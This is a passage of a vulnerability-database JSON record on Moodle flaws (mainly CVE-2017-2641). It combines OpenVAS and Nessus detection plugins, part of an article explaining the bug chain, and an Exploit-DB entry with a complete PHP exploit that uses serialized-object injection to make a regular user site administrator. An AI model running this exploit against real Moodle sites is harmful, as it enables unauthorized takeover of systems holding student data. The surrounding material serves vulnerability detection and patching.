https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113179\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-08 14:24:34 +0200 (Tue, 08 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2017-2644\", \"CVE-2017-2645\");\n script_bugtraq_id(96979, 96982);\n\n script_name(\"Moodle 3.x Multiple XSS Vulnerabilities - Mar'17 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle is prone to multiple XSS vulnerabilities.\");\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on a target host.\");\n script_tag(name:\"insight\", value:\"Users have the ability to upload evidence of prior learning.\n In this, both in the text and in the attachment, an XSS script could be embedded.\");\n script_tag(name:\"affected\", value:\"Moodle versions 3.1.0 through 3.1.4 and 3.2.0 through 3.2.1.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.5 or 3.2.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349421\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=349422\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_in_range( version: version, test_version: \"3.1.0\", test_version2: \"3.1.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "myhack58": [{"lastseen": "2017-03-26T05:27:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-2641"], "edition": 1, "description": "## 0x01 overview\n\nVulnerability, CVE-2017-2641 allows the attacker in a vulnerable Moodle on the server execute the PHP code. 
This vulnerability is actually a chain of several smaller weaknesses, as the article goes on to show.\n\nMoodle is a very popular learning management system, deployed at many universities around the world, including MIT, Stanford, Cambridge, Oxford and other top research institutions.\n\nMoodle stores a lot of sensitive information, such as grades, tests and students' personal data, which makes it an attractive target; that is the main reason I audited it.\n\nThis vulnerability affects almost all deployed Moodle versions, as listed in the \u201caffected versions\u201d section below. I recommend that all Moodle administrators apply the [security patches](<https://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-58010>).\n\n## 0x02 Affected versions\n\n3.2\u301c3.2.1\n\n3.1\u301c3.1.4\n\n3.0\u301c3.0.8\n\n2.7.0\u301c2.7.18 and other unsupported versions\n\n## 0x03 Technical description\n\n### Part 1 - There is a problem in most of the code\n\nMoodle is a very large system: it contains thousands of files, hundreds of different components and about 200 million lines of PHP code. It is therefore inevitable that different developers write different parts of the code, and that these parts affect each other.\n\nIn what follows I will demonstrate how the vulnerable code can be exploited. The root cause is that too many developers failed to document their assumptions, which led to a serious logic vulnerability; almost any system with a large code base is prone to logic vulnerabilities of this kind.\n\nIn the system's built-in Ajax mechanism, an obvious case of \u201csame functionality, different code\u201d can be seen.\n\nMoodle has a dynamic Ajax system that allows different components to use the system's built-in Ajax interface. Moodle does this through \u201cExternal Functions\u201d. 
Each component that uses the built-in Ajax mechanism registers its \u201cExternal Functions\u201d, specifying the component, the function name and the capabilities required to call it.\n\nWhen a component wishes to use the Ajax interface, it simply calls the \u201cservice.php\u201d endpoint with the name of an external function it registered earlier. In this way Moodle lets component developers reuse its built-in Ajax interface and saves them the trouble of writing their own.\n\nHowever, when the Moodle core developers started using this interface themselves, the problem arose.\n\nIf a component needs an Ajax request to change a user's preferences, it calls the \u201csetuserpref.php\u201d file, specifying the name of the preference to change and its new value. This can be seen in the following code:\n\n![](/Article/UploadPic/2017-3/201732612465703.png)\n\nIn the highlighted row in the middle of the code, we can see that Moodle tries to ensure that the preference to be changed is defined in the \u201cajax_updatable_user_prefs\u201d array, which lists the preferences that may be changed through Ajax. Moodle does this because it does not want a malicious attacker like us to change anything important.\n\nAlthough most users never go through the Ajax interface at all, and preferences can also be changed by other means, the Moodle developers tried to prevent any future misuse of this mechanism in advance.\n\nThat was the case until the external function \u201cupdate_user_preferences\u201d was added. 
This function was added to replace the old \u201cupdate_users\u201d function, which could \u201cpotentially [be] used to update any user attribute\u201d \u2013 obviously a very bad thing, since the old function was only meant to update the user's preferences and so had no reason to be able to change anything else.\n\nThe main difference between the old and the new function is that the old one was not reachable through the Ajax interface, while the new one is \u2013 presumably because the so-called dangerous ability to change any user attribute had been removed.\n\nMost importantly, they implemented a proper permission check, so even if an attacker can call the user-preference function, it can only be used on the attacker's own user.\n\nHowever, it does not matter whose preferences later reach an \u201ceval\u201d or \u201cexec\u201d call \u2013 a dangerous function is dangerous regardless of which user triggers it, as long as it can be reached.\n\nLet us first take a look at the function's code:\n\n\npublic static function update_user_preferences($userid, ..., $preferences) { \n...\n// If we are trying to edit our own user preferences\nif ($userid == $USER->id) {\n// Requires the capability to edit our own profile, which we have\nrequire_capability('moodle/user:editownmessageprofile', $systemcontext);\n} else { // Otherwise, we are tring to edit someone else's preferences\n/* Require admin capabilities... */\n}\n\n// Set the user's preferences. \nforeach ($preferences as $preference) {\nset_user_preference($preference['type'], $preference['value'], $userid);\n}\n...\n}\n\nBy looking at the code, we can see that, thanks to the permission check, we can only edit our own preferences \u2013 but something is still missing. 
Although the code ensures that we can only edit our own user preferences, it does not check which preferences we change \u2013 unlike the other Ajax page responsible for changing user preferences, \u201csetuserpref.php\u201d, which does.\n\nThis is a typical example of different developers, at different times and with different needs, writing different code for the same functionality. In this case they assumed that user preferences could not be used in any malicious way \u2013 they considered them unexploitable.\n\n### Part 2 - Exploiting the unexploitable\n\nThere is a reason why user preferences are considered unexploitable. They have hardly any impact on how the system operates \u2013 they cannot be used in DB queries, they do not define any components, they only affect the GUI part of the system, and even that only in minor ways.\n\nSo, what do we do now?\n\nWell, let us first look at how the GUI part of the system works.\n\nMoodle uses a Blocks mechanism that allows components to display relevant data to the user. These blocks can be added and removed by the user.\n\nOne of these blocks \u2013 \u201ccourse_overview\u201d \u2013 shows the user the list of courses they are enrolled in. To store the order of the enrolled courses, the course overview block uses a specific user preference called \u201ccourse_overview_course_sortorder\u201d. 
This preference stores the list of IDs of all the courses the user is enrolled in, ordered by the time of enrolment.\n\n**[1] [[2]](<84655_2.htm>) [[3]](<84655_3.htm>) [next](<84655_2.htm>)**\n", "modified": "2017-03-26T00:00:00", "published": "2017-03-26T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84655.htm", "id": "MYHACK58:62201784655", "type": "myhack58", "title": "[CVE-2017-2641]Moodle remote code execution vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2017-04-06T21:17:22", "description": "Moodle 2.x/3.x - SQL Injection. CVE-2017-2641. Webapps exploit for PHP platform", "published": "2017-04-06T00:00:00", "type": "exploitdb", "title": "Moodle 2.x/3.x - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-06T00:00:00", "id": "EDB-ID:41828", "href": "https://www.exploit-db.com/exploits/41828/", "sourceData": "# Exploit: Moodle SQL Injection via Object Injection Through User Preferences\r\n# Date: April 6th, 2017\r\n# Exploit Author: Marko Belzetski\r\n# Contact: mbelzetski@protonmail.com\r\n# Vendor Homepage: https://moodle.org/\r\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\r\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\r\n# CVE : CVE-2017-2641\r\n\r\n1. Description\r\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an object injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\r\n\r\n2. PoC\r\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. 
Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\r\n\r\n<?php\r\n\r\n//defining the required classes for our exploit\r\nnamespace gradereport_singleview\\local\\ui {\r\n class feedback{ \r\n }\r\n}\r\n\r\nnamespace {\r\n class gradereport_overview_external{\r\n}\r\n\r\nclass grade_item{\r\n}\r\n\r\nclass grade_grade{\r\n}\r\n\r\n\r\n// creating a simple httpPost method which requires php-curl\r\nfunction httpPost($url, $data, $MoodleSession, $json)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n if($json){\r\n array_push($headers, 'Content-Type: application/json');\r\n }else{\r\n $data = urldecode(http_build_query($data));\r\n }\r\n curl_setopt($curl, CURLOPT_POST, true);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n\r\n// creating a simple httpGet method which requires php-curl\r\nfunction httpGet($url, $MoodleSession)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n\r\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\r\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\r\n $base = new gradereport_overview_external();\r\n\r\n // now we 
create the feedback object which inherits the vulnerable __tostring() method from its parent\r\n $fb = new gradereport_singleview\\local\\ui\\feedback();\r\n\r\n //filling the feedback object with the required properties for the exploit to work\r\n $fb -> grade = new grade_grade();\r\n $fb -> grade -> grade_item = new grade_item();\r\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\r\n $fb -> grade -> grade_item -> calculation_normalized = false;\r\n\r\n //setting the table which we want to alter\r\n $fb -> grade -> grade_item -> table = $table;\r\n //setting the row id of the row that we want to alter\r\n $fb -> grade -> grade_item -> id = $rowId;\r\n //setting the column with the value that we want to insert\r\n $fb -> grade -> grade_item -> $column = $value;\r\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\r\n \r\n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\r\n $arr = array(array($base),$fb);\r\n \r\n //serializing the array\r\n $value = serialize($arr);\r\n\r\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\r\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\r\n httpPost($url. 
'/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n\r\n //injecting the payload\r\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\r\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\r\n\r\n //getting the frontpage so the payload will activate\r\n httpGet($url.'/my/', $MoodleSession);\r\n }\r\n\r\n$url = ''; //url of the Moodle site\r\n$MoodleSession = '' //your MoodleSession cookie value\r\n$sesskey = ''; //your sesskey\r\n\r\n$table = \"config\"; //table to update \r\n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation\r\n$column = 'value'; //column name to update, which holds the userid\r\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\r\n\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\r\n\r\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\r\n$rowId = 375 // row id of 'allversionshash' parameter\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\r\n\r\n//reset the sortorder so we can see the front page again without the payload triggering\r\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\r\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n\r\n//force plugincheck so we can access admin panel\r\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\r\n\r\n}\r\n?>\r\n\r\n\r\n3. 
Solution:\r\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41828/"}], "nessus": [{"lastseen": "2021-01-07T10:14:07", "description": "3.2.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : moodle (2017-d5dbc23747)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-D5DBC23747.NASL", "href": "https://www.tenable.com/plugins/nessus/101726", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d5dbc23747.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101726);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-d5dbc23747\");\n\n script_name(english:\"Fedora 26 : moodle (2017-d5dbc23747)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"3.2.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the 
Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d5dbc23747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"moodle-3.2.2-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:06", "description": "Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": 
"2017-04-03T00:00:00", "title": "Fedora 25 : moodle (2017-0196511d58)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-0196511D58.NASL", "href": "https://www.tenable.com/plugins/nessus/99141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0196511d58.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99141);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-0196511d58\");\n\n script_name(english:\"Fedora 25 : moodle (2017-0196511d58)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0196511d58\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"moodle-3.1.5-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:14", "description": "Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-03T00:00:00", "title": "Fedora 24 : moodle (2017-0fcaf52f1a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-0FCAF52F1A.NASL", "href": "https://www.tenable.com/plugins/nessus/99142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0fcaf52f1a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99142);\n script_version(\"3.6\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-2641\");\n script_xref(name:\"FEDORA\", value:\"2017-0fcaf52f1a\");\n\n script_name(english:\"Fedora 24 : moodle (2017-0fcaf52f1a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update for multiple CVEs\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0fcaf52f1a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"moodle-3.1.5-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : 